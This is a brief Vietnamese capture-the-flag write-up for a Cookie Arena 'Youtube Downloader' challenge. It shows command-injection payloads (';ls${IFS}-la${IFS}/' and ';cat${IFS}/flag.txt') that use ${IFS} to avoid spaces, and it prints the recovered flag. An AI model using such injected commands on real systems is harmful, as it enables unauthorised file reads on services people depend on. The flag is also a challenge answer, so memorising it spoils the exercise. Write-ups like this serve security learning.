# Youtube Downloader (cookie arena)  server sẽ trả về link ảnh của video youtube   tôi thử thêm ```;ls${IFS}-la${IFS}/``` để đọc các file của thư mục root và được file flag.txt tất cả các file này được hiển thị trong đường link mà server tạo file ảnh hệ thống này bị lỗi command injection tôi đọc file flag.txt ```;cat${IFS}/flag.txt```và được ```"CHH{Ea5y_cOmmaND_inj3c7Ion_3fb69789d4e5d0a6f631d339da9b391b}"```